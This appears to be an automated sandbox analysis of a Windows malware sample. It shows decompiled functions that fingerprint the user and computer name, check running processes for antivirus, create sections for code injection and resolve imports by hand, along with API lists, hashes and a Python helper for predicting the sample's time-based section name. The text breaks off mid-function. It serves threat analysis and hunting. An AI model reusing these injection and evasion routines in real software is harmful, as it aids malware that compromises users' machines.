                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1724014008-0
                                                            • Opcode ID: 83308b737ff004b7ad0ca1e6b0a850f4c480396983dc5a579a8eea8f62ebf6f0
                                                            • Instruction ID: d7492c5b470a8a9eccd7e46ecba11dc3d4fa01c96a057bfe7780c394a8acb257
                                                            • Opcode Fuzzy Hash: 83308b737ff004b7ad0ca1e6b0a850f4c480396983dc5a579a8eea8f62ebf6f0
                                                            • Instruction Fuzzy Hash: 25215CB2940108BFDB01AFF9EC88E9E77ADEF49354F104026F615E7240D671AD498BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
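
The section name in E6E4B109B is derived from the clock: GetSystemTimeAsFileTime yields a 64-bit count of 100 ns intervals since 1601, _aulldiv divides it by the constant pushed as 0x192:0x54D38000 (0x19254D38000 = 1,728,000,000,000, i.e. 172,800 s or exactly 48 hours), and the quotient goes through _snwprintf into a 22-wide-character buffer. The format string at 0x6e4b5054 (plus the relocation delta) is not reproduced in the dump, so the text of the name is unknown, but the numeric part is the same on every host and changes only every two days, which is what makes the section usable as a rendezvous point between injected components and predictable for hunting. The following added Python example (not code from the report or from the sample) reproduces that slot computation so that an analyst can work out the value a host used at a given time, the UTC window of a slot, and the neighbouring slots to try when the victim clock and the collection time disagree; the function names are this example's own.

```python
from datetime import datetime, timedelta, timezone

FILETIME_UNIX_EPOCH = 116444736000000000  # FILETIME of 1970-01-01T00:00:00Z
HUNDRED_NS_PER_SEC = 10_000_000
SLOT_DIVISOR = 0x19254D38000              # _aulldiv divisor: dwords 0x192, 0x54D38000


def slot_period_seconds() -> int:
    """Length of one naming period in seconds (the divisor expressed in 100 ns units)."""
    return SLOT_DIVISOR // HUNDRED_NS_PER_SEC


def unix_to_filetime(unix_seconds: float) -> int:
    """POSIX timestamp -> Windows FILETIME (100 ns intervals since 1601-01-01)."""
    return int(unix_seconds * HUNDRED_NS_PER_SEC) + FILETIME_UNIX_EPOCH


def name_slot(filetime: int) -> int:
    """The quotient the sample formats into the section name (FILETIME / 48 h)."""
    return filetime // SLOT_DIVISOR


def slot_at_unix(unix_seconds: float) -> int:
    """Slot in effect at a POSIX timestamp (UTC, as GetSystemTimeAsFileTime is)."""
    return name_slot(unix_to_filetime(unix_seconds))


def slot_window(slot: int) -> tuple:
    """POSIX [start, end) during which GetSystemTimeAsFileTime maps to this slot.

    Slot boundaries are whole multiples of 172,800 s and the Unix epoch itself lies
    on one (1601-01-01 to 1970-01-01 is an even number of days), so this is exact.
    """
    start = (slot * SLOT_DIVISOR - FILETIME_UNIX_EPOCH) // HUNDRED_NS_PER_SEC
    return start, start + slot_period_seconds()


def slot_window_utc(slot: int) -> tuple:
    """Same window as aware datetimes, for reading timelines."""
    start, end = slot_window(slot)
    epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
    return epoch + timedelta(seconds=start), epoch + timedelta(seconds=end)


def candidate_slots(unix_seconds: float, skew: int = 1) -> list:
    """Slots to try when the victim clock may be off by up to `skew` periods."""
    centre = slot_at_unix(unix_seconds)
    return [centre + d for d in range(-skew, skew + 1)]


if __name__ == "__main__":
    now = datetime.now(timezone.utc).timestamp()
    slot = slot_at_unix(now)
    start, end = slot_window_utc(slot)
    print(f"period {slot_period_seconds()} s, current slot {slot}, window {start} .. {end}")
    print("candidates:", candidate_slots(now))
```

To hunt for the section on a live system or in a handle table, format each candidate slot with whatever format string is recovered from 0x6e4b5054 and compare against the names of open sections; the candidates straddling a boundary are what matter when a capture was taken within minutes of a 48-hour rollover.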

                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0458C1AC,00000000), ref: 04573827
                                                            • StrRChrA.SHLWAPI(049BA5B0,00000000,0000005C,00000000,00000001,00000000,0458C16C,00000000,?), ref: 0457383C
                                                            • _strupr.NTDLL ref: 04573852
                                                            • lstrlen.KERNEL32(049BA5B0), ref: 0457385A
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,0458C16C,00000000,?), ref: 045738DA
                                                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,04570001), ref: 04573901
                                                            • GetLastError.KERNEL32(?), ref: 0457391B
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(01348118), ref: 04573931
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                            • String ID:
                                                            • API String ID: 1098824789-0
                                                            • Opcode ID: 4a4e6ee6bdb029a5582c3956d2e63ab6b40879bd5c536f339612ca07ff5264c2
                                                            • Instruction ID: 23e5bcb1798e548e48ad1d99e34c607f797ab2b72dc6fe582a5d64ea9561900f
                                                            • Opcode Fuzzy Hash: 4a4e6ee6bdb029a5582c3956d2e63ab6b40879bd5c536f339612ca07ff5264c2
                                                            • Instruction Fuzzy Hash: 7D3193729001159FE711AF74BC84A6E77A4F705764B11153DEA12F7241DA38AD48FBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00DD2E33(char __eax, signed int* __esi) {
                                                            				long _v8;
                                                            				char _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				signed int _v28;
                                                            				long _t34;
                                                            				signed int _t39;
                                                            				long _t50;
                                                            				char _t59;
                                                            				intOrPtr _t61;
                                                            				void* _t62;
                                                            				void* _t63;
                                                            				signed int* _t64;
                                                            				char _t65;
                                                            				intOrPtr* _t67;
                                                            				void* _t68;
                                                            				signed int* _t69;
                                                            
                                                            				_t69 = __esi;
                                                            				_t65 = __eax;
                                                            				_v8 = 0;
                                                            				_v12 = __eax;
                                                            				if(__eax == 0) {
                                                            					_t59 =  *0xdda2c8; // 0xbd092303
                                                            					_v12 = _t59;
                                                            				}
                                                            				_t64 = _t69;
                                                            				E00DD3569( &_v12, _t64);
                                                            				if(_t65 != 0) {
                                                            					 *_t69 =  *_t69 ^  *0xdda2d0 ^ 0x46d76429;
                                                            				} else {
                                                            					GetUserNameW(0,  &_v8); // executed
                                                            					_t50 = _v8;
                                                            					if(_t50 != 0) {
                                                            						_t62 = RtlAllocateHeap( *0xdda290, 0, _t50 + _t50);
                                                            						if(_t62 != 0) {
                                                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                            								_t63 = _t62;
                                                            								 *_t69 =  *_t69 ^ E00DD1D41(_v8 + _v8, _t63);
                                                            							}
                                                            							HeapFree( *0xdda290, 0, _t62);
                                                            						}
                                                            					}
                                                            				}
                                                            				_t61 = __imp__;
                                                            				_v8 = _v8 & 0x00000000;
                                                            				GetComputerNameW(0,  &_v8);
                                                            				_t34 = _v8;
                                                            				if(_t34 != 0) {
                                                            					_t68 = RtlAllocateHeap( *0xdda290, 0, _t34 + _t34);
                                                            					if(_t68 != 0) {
                                                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                            							_t63 = _t68;
                                                            							_t69[3] = _t69[3] ^ E00DD1D41(_v8 + _v8, _t63);
                                                            						}
                                                            						HeapFree( *0xdda290, 0, _t68);
                                                            					}
                                                            				}
                                                            				asm("cpuid");
                                                            				_t67 =  &_v28;
                                                            				 *_t67 = 1;
                                                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                            				 *(_t67 + 8) = _t63;
                                                            				 *(_t67 + 0xc) = _t64;
                                                            				_t39 = _v16 ^ _v20 ^ _v28;
                                                            				_t69[1] = _t69[1] ^ _t39;
                                                            				return _t39;
                                                            			}

                                                            APIs
                                                            • GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E6A
                                                            • RtlAllocateHeap.NTDLL(00000000,00DD5FA9), ref: 00DD2E81
                                                            • GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E8E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DD5FA9,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2EAF
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2ED6
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DD2EEA
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2EF7
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 00DD2F15
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                            • String ID:
                                                            • API String ID: 3239747167-0
                                                            • Opcode ID: c58d4f5fc195a0e61a96d3449ec36dbe7c4fdf812a1b1efcfb2b7470f514cbd5
                                                            • Instruction ID: c69ab44fa557f1c4df08ee17bb8e362b881c1e20093e6c4bfeb04bc71b9ecb3b
                                                            • Opcode Fuzzy Hash: c58d4f5fc195a0e61a96d3449ec36dbe7c4fdf812a1b1efcfb2b7470f514cbd5
                                                            • Instruction Fuzzy Hash: 54310772A01209EFDB11DFA9DD81A7EBBF9FB58300F14842AE505D6360E731AE009B31
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 0456DEBE
                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 0456DED1
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0456DEED
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0456DF0A
                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0456DF17
                                                            • NtClose.NTDLL(00000001), ref: 0456DF29
                                                            • NtClose.NTDLL(00000000), ref: 0456DF33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2575439697-0
                                                            • Opcode ID: 75676ce218a34f272b42a5f382b1f3290cb88daf2c55341004b081989274a43f
                                                            • Instruction ID: 3467277e939ddbe769c699a31dcb4123a420a74da33ffd375a8cc572a80991cc
                                                            • Opcode Fuzzy Hash: 75676ce218a34f272b42a5f382b1f3290cb88daf2c55341004b081989274a43f
                                                            • Instruction Fuzzy Hash: 11211972A00219BBDB019F95DC44ADEBFBDFF48750F10405AF902B6120DB759A48ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E00DD22EC(char _a4, void* _a8) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				void* _v44;
                                                            				void** _t33;
                                                            				void* _t40;
                                                            				void* _t43;
                                                            				void** _t44;
                                                            				intOrPtr* _t47;
                                                            				char _t48;
                                                            
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_v20 = _a4;
                                                            				_t48 = 0;
                                                            				_v16 = 0;
                                                            				_a4 = 0;
                                                            				_v44 = 0x18;
                                                            				_v40 = 0;
                                                            				_v32 = 0;
                                                            				_v36 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                            					_t33 =  &_v8;
                                                            					__imp__(_v12, 8, _t33);
                                                            					if(_t33 >= 0) {
                                                            						_t47 = __imp__;
                                                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                            						_t44 = E00DD77D7(_a4);
                                                            						if(_t44 != 0) {
                                                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                            							if(_t40 >= 0) {
                                                            								memcpy(_a8,  *_t44, 0x1c);
                                                            								_t48 = 1;
                                                            							}
                                                            							E00DD77EC(_t44);
                                                            						}
                                                            						NtClose(_v8); // executed
                                                            					}
                                                            					NtClose(_v12);
                                                            				}
                                                            				return _t48;
                                                            			}

                                                            APIs
                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00DD2333
                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00DD2346
                                                            • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DD2362
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DD237F
                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00DD238C
                                                            • NtClose.NTDLL(00000000), ref: 00DD239E
                                                            • NtClose.NTDLL(00000000), ref: 00DD23A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2575439697-0
                                                            • Opcode ID: 3de366defee01c21a2d343a2c8c2a1fdf469285fa05a26c61ffb500716d0c47d
                                                            • Instruction ID: 2acd8bacdf0da88330179cdc5051622ba45fa955884225d501e0176c907e160c
                                                            • Opcode Fuzzy Hash: 3de366defee01c21a2d343a2c8c2a1fdf469285fa05a26c61ffb500716d0c47d
                                                            • Instruction Fuzzy Hash: C421F5B2901229BBDB11AF95CC45EDEBFBDEF08750F104066F904E6260D7729A459BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04561330
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0456133D
                                                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 045613C9
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 045613D4
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 045613DD
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 045613F2
                                                              • Part of subcall function 04562730: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0456136B,?), ref: 04562738
                                                              • Part of subcall function 04562730: GetVersion.KERNEL32 ref: 04562747
                                                              • Part of subcall function 04562730: GetCurrentProcessId.KERNEL32 ref: 04562756
                                                              • Part of subcall function 04562730: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04562773
                                                              • Part of subcall function 04575020: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,04561379,?), ref: 0457507F
                                                              • Part of subcall function 0457B54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,0456138B,00000000,0458C16C,00000000), ref: 0457B572
                                                              • Part of subcall function 0457527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 0457529A
                                                              • Part of subcall function 0457527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752AB
                                                              • Part of subcall function 0457527F: CloseHandle.KERNEL32(00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
                                                            • String ID:
                                                            • API String ID: 3825956196-0
                                                            • Opcode ID: c1508d0f713b6e1009b448bbb7b789d8d8ac2158fb95f4e4a42374eb3627bc7f
                                                            • Instruction ID: 83e89594a58e2d67f5ad6f83fb8108c193a27b1d44b4e10113a0eb1a6a75ade2
                                                            • Opcode Fuzzy Hash: c1508d0f713b6e1009b448bbb7b789d8d8ac2158fb95f4e4a42374eb3627bc7f
                                                            • Instruction Fuzzy Hash: E031A071A00614EFCB21EF68ED84D7E77B8FB84754B100169E553EB641EA34AD44FBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD11B8() {
                                                            				char _v264;
                                                            				void* _v300;
                                                            				void* _t5;
                                                            				int _t8;
                                                            				intOrPtr _t9;
                                                            				int _t15;
                                                            				void* _t17;
                                                            
                                                            				_t15 = 0;
                                                            				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                                            				_t17 = _t5;
                                                            				if(_t17 != 0) {
                                                            					_t8 = Process32First(_t17,  &_v300); // executed
                                                            					while(_t8 != 0) {
                                                            						_t9 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t2 = _t9 + 0xddbde4; // 0x73617661
                                                            						if(StrStrIA( &_v264, _t2) != 0) {
                                                            							_t15 = 1;
                                                            						} else {
                                                            							_t8 = Process32Next(_t17,  &_v300);
                                                            							continue;
                                                            						}
                                                            						L7:
                                                            						CloseHandle(_t17);
                                                            						goto L8;
                                                            					}
                                                            					goto L7;
                                                            				}
                                                            				L8:
                                                            				return _t15;
                                                            			}

                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DD11C8
                                                            • Process32First.KERNEL32(00000000,?), ref: 00DD11DB
                                                            • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 00DD11F5
                                                            • Process32Next.KERNEL32(00000000,?), ref: 00DD1207
                                                            • CloseHandle.KERNEL32(00000000), ref: 00DD1216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: 08b54ebb9c76b071c201eef34593888d98ece8699138b0aeb5ee88de39ba2ea7
                                                            • Instruction ID: 9a0f5e88027499194f3f032ca88bc22a387b2f0f94482e55c2b2fca4cd7181cb
                                                            • Opcode Fuzzy Hash: 08b54ebb9c76b071c201eef34593888d98ece8699138b0aeb5ee88de39ba2ea7
                                                            • Instruction Fuzzy Hash: BAF0BB3A10212476D720E77A9C4AFEB7B6CDBD5310F0500A3F945D3201E775CA4586B9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E6E4B2013(intOrPtr* __eax, void** _a4) {
                                                            				int _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				int _v32;
                                                            				intOrPtr _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				void* _v48;
                                                            				void* __esi;
                                                            				long _t34;
                                                            				void* _t39;
                                                            				void* _t47;
                                                            				intOrPtr* _t48;
                                                            
                                                            				_t48 = __eax;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_v24 =  *((intOrPtr*)(__eax + 4));
                                                            				_v16 = 0;
                                                            				_v12 = 0;
                                                            				_v48 = 0x18;
                                                            				_v44 = 0;
                                                            				_v36 = 0x40;
                                                            				_v40 = 0;
                                                            				_v32 = 0;
                                                            				_v28 = 0;
                                                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                            				if(_t34 < 0) {
                                                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                            				} else {
                                                            					 *_t48 = _v16;
                                                            					_t39 = E6E4B121F(_t48,  &_v12); // executed
                                                            					_t47 = _t39;
                                                            					if(_t47 != 0) {
                                                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                            					} else {
                                                            						memset(_v12, 0, _v24);
                                                            						 *_a4 = _v12;
                                                            					}
                                                            				}
                                                            				return _t47;
                                                            			}

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E4B2070
                                                              • Part of subcall function 6E4B121F: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E4B124C
                                                            • memset.NTDLL ref: 6E4B2092
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID: @
                                                            • API String ID: 2533685722-2766056989
                                                            • Opcode ID: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                                            • Instruction ID: c47d038c464b31fd8b92ce26094c60ea6852df86d7d2e4ff3bc06de5ef7effcd
                                                            • Opcode Fuzzy Hash: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                                            • Instruction Fuzzy Hash: F8211DB5D00209AFDB11DFE9C8849DEFBF9EF48354F50842AE615F3210D7319A498BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000318), ref: 04569318
                                                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04569334
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                              • Part of subcall function 04566EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04566ED9
                                                              • Part of subcall function 04566EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04569375,00000000,00000000,00000028,00000100), ref: 04566EFB
                                                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0456949E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                            • String ID:
                                                            • API String ID: 3547194813-0
                                                            • Opcode ID: 33bf7cf1d27c3fd319d8d7e13017ac122782bf3930f636903011b34e0aefe942
                                                            • Instruction ID: 921fc81f635b7c3a1a5346c7b2a2479b0fa7abcc571be108e406d14ce897fb75
                                                            • Opcode Fuzzy Hash: 33bf7cf1d27c3fd319d8d7e13017ac122782bf3930f636903011b34e0aefe942
                                                            • Instruction Fuzzy Hash: 45615DB0A0020AAFDF14DFA8D980BAEB7B5FF48305F004058ED15EB241DB34EA55DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04575B01
                                                            • GetProcAddress.KERNEL32(?), ref: 04575B29
                                                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04575B47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressInformationProcProcess64QueryWow64memset
                                                            • String ID:
                                                            • API String ID: 2968673968-0
                                                            • Opcode ID: 84c88b17f14b38c7686d4db75b1fb9bff8df92f1662f92b12047a65db92b4e57
                                                            • Instruction ID: 2024bf9d317edc0d52fdee537aceaef36dd4ea5f006b91692ad34a8f0778f6b4
                                                            • Opcode Fuzzy Hash: 84c88b17f14b38c7686d4db75b1fb9bff8df92f1662f92b12047a65db92b4e57
                                                            • Instruction Fuzzy Hash: E0115431600219BFDB11DB54ED85FAD77B9FB44704F054029E905EB290EB74ED05DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E6E4B1552(void* __edi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr* _v12;
                                                            				_Unknown_base(*)()** _v16;
                                                            				signed int _v20;
                                                            				signed short _v24;
                                                            				struct HINSTANCE__* _v28;
                                                            				intOrPtr _t43;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr _t46;
                                                            				struct HINSTANCE__* _t47;
                                                            				intOrPtr* _t49;
                                                            				intOrPtr _t50;
                                                            				signed short _t51;
                                                            				_Unknown_base(*)()* _t53;
                                                            				CHAR* _t54;
                                                            				_Unknown_base(*)()* _t55;
                                                            				void* _t58;
                                                            				signed int _t59;
                                                            				_Unknown_base(*)()* _t60;
                                                            				intOrPtr _t61;
                                                            				intOrPtr _t65;
                                                            				signed int _t68;
                                                            				void* _t69;
                                                            				CHAR* _t71;
                                                            				signed short* _t73;
                                                            
                                                            				_t69 = __edi;
                                                            				_v20 = _v20 & 0x00000000;
                                                            				_t59 =  *0x6e4b41cc;
                                                            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                            				if(_t43 != 0) {
                                                            					_t45 = _t43 + __edi;
                                                            					_v12 = _t45;
                                                            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                            					if(_t46 != 0) {
                                                            						while(1) {
                                                            							_t71 = _t46 + _t69;
                                                            							_t47 = LoadLibraryA(_t71); // executed
                                                            							_v28 = _t47;
                                                            							if(_t47 == 0) {
                                                            								break;
                                                            							}
                                                            							_v24 = _v24 & 0x00000000;
                                                            							 *_t71 = _t59 - 0x69b25f44;
                                                            							_t49 = _v12;
                                                            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                            							_t50 =  *_t49;
                                                            							if(_t50 != 0) {
                                                            								L6:
                                                            								_t73 = _t50 + _t69;
                                                            								_v16 = _t61 + _t69;
                                                            								while(1) {
                                                            									_t51 =  *_t73;
                                                            									if(_t51 == 0) {
                                                            										break;
                                                            									}
                                                            									if(__eflags < 0) {
                                                            										__eflags = _t51 - _t69;
                                                            										if(_t51 < _t69) {
                                                            											L12:
                                                            											_t21 =  &_v8;
                                                            											 *_t21 = _v8 & 0x00000000;
                                                            											__eflags =  *_t21;
                                                            											_v24 =  *_t73 & 0x0000ffff;
                                                            										} else {
                                                            											_t65 = _a4;
                                                            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                            												goto L12;
                                                            											} else {
                                                            												goto L11;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										_t51 = _t51 + _t69;
                                                            										L11:
                                                            										_v8 = _t51;
                                                            									}
                                                            									_t53 = _v8;
                                                            									__eflags = _t53;
                                                            									if(_t53 == 0) {
                                                            										_t54 = _v24 & 0x0000ffff;
                                                            									} else {
                                                            										_t54 = _t53 + 2;
                                                            									}
                                                            									_t55 = GetProcAddress(_v28, _t54);
                                                            									__eflags = _t55;
                                                            									if(__eflags == 0) {
                                                            										_v20 = _t59 - 0x69b25ec5;
                                                            									} else {
                                                            										_t68 = _v8;
                                                            										__eflags = _t68;
                                                            										if(_t68 != 0) {
                                                            											 *_t68 = _t59 - 0x69b25f44;
                                                            										}
                                                            										 *_v16 = _t55;
                                                            										_t58 = 0x593682f4 + _t59 * 4;
                                                            										_t73 = _t73 + _t58;
                                                            										_t32 =  &_v16;
                                                            										 *_t32 = _v16 + _t58;
                                                            										__eflags =  *_t32;
                                                            										continue;
                                                            									}
                                                            									goto L23;
                                                            								}
                                                            							} else {
                                                            								_t50 = _t61;
                                                            								if(_t61 != 0) {
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            							L23:
                                                            							_v12 = _v12 + 0x14;
                                                            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                            							if(_t46 != 0) {
                                                            								continue;
                                                            							} else {
                                                            							}
                                                            							L26:
